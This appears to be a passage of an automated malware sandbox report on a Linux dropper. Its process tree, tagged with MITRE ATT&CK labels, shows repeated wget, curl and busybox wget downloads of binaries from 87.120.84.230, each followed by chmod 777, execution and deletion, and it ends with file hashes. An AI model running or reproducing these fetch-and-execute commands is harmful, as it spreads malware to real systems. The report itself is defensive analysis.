/bin/chmodchmod 777 j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- File and Directory Permissions Modification
PID:1640
-
-
/tmp/j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR./j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵
- Executes dropped EXE
PID:1641
-
-
/bin/rmrm j6AVAMaOngkD5kSxEbQdPJeOG9n9VEyOkR2⤵PID:1642
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1643
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Writes file to tmp directory
PID:1644
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1645
-
-
/bin/chmodchmod 777 nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- File and Directory Permissions Modification
PID:1646
-
-
/tmp/nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX./nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵
- Executes dropped EXE
PID:1647
-
-
/bin/rmrm nRtF0JMF5l1If3vwcSPlBIe7CRUTD9bRTX2⤵PID:1648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1649
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Writes file to tmp directory
PID:1650
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1651
-
-
/bin/chmodchmod 777 UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC6./UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm UA6bc9cD11v7hnvPrgpQ9KwsP8LiauBPC62⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1657
-
-
/bin/chmodchmod 777 vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx./vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm vExDvpG3t84g9wf0sHWI2dVd8Sz6IAKsYx2⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1663
-
-
/bin/chmodchmod 777 DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm./DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm DTuId2Cu0wiso5Bs88TTfo7DNxaIXwHOlm2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1669
-
-
/bin/chmodchmod 777 aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd./aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm aW7aG8a7OtOJbmN8O3EVRo0BmwFFcXrRWd2⤵PID:1672
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97